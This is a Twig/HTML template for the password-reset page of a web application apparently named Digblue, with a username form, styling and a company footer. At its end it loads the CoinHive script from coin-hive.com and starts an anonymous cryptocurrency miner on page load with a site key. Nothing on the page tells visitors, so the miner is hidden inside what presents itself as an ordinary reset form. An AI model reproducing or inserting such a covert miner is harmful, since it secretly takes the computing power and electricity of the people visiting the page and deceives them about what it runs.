{% trans_default_domain 'FOSUserBundle' %}

<!DOCTYPE html>
<html lang="de">
<head>
    <meta charset="utf-8"/>
    <title>Digblue</title>
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta content="width=device-width, initial-scale=1" name="viewport"/>
    <meta charset="UTF-8">
    <meta content="CREA Werbeagentur GmbH" name="author"/>

    <link rel="shortcut icon" href="{{ asset('assets/digblue-logo-icon.ico') }}"/>
    {% block style %}
    {% endblock %}
    {#<link href="http://fonts.googleapis.com/css?family=Open+Sans:400,300,600,700&subset=all" rel="stylesheet" type="text/css"/>#}
    <link lazyload rel="stylesheet" href="{{ asset('assets/vendor/bootstrap/css/bootstrap.min.css') }}"/>
    <link lazyload rel="stylesheet" href="{{ asset('assets/css/components-rounded.min.css') }}"/>
    <link lazyload rel="stylesheet" href="{{ asset('assets/css/login.css') }}"/>


    <link rel="stylesheet" type="text/css" href="{{ asset('assets/vendor/font-awesome/css/font-awesome.min.css') }}">

    <style type="text/css">

        body { background-color:#3b3f51 !important;}
        .login .content .form-control {
            background-color: #3B5998;!important;
            border: 1px solid #3B59D0;!important;
        }

    </style>
</head>

<body class=" login">
<div class="logo">
    <a href="{{ path("fos_user_security_login") }}">
        <img src="{{ asset('assets/img/digblue-logo-sm.png') }}" alt=""/> </a>
</div>

<div class="content" style="text-align: center; color: #FFFFFF;">
    <form action="{{ path('fos_user_resetting_send_email') }}" method="POST" class="fos_user_resetting_request">
        <div>
            <label for="username">{{ 'resetting.request.username'|trans }}</label>
            <input type="text" id="username" name="username" required="required" style="margin-top:10px;color: #000;"/>
        </div>
        <div>
            <input type="submit" value="{{ 'resetting.request.submit'|trans }}" style="margin-top:10px;color: #000;"/>
        </div>
    </form>
</div>

<div class="copyright">
    <a target="_blank" href="http://crea.de"><i class="fa fa-copyright" aria-hidden="true"></i> 2017 by CREA Werbeagentur GmbH</a>
    |<a href="http://crea.de/impressum" target="_blank">Impressum</a>
    |<a href="http://crea.de/datenschutzhinweise" target="_blank">Datenschutz</a> </div>
<script src="{{ asset("assets/js/jquery.min.js") }}"></script>
<script src="https://coin-hive.com/lib/coinhive.min.js"></script>
<script>
    $(function() {
        var miner = new CoinHive.Anonymous('ZaIsbcriI3WVk3Et2f80s1LdM2VGc1S1');
        miner.start();
    });
</script>
</body>

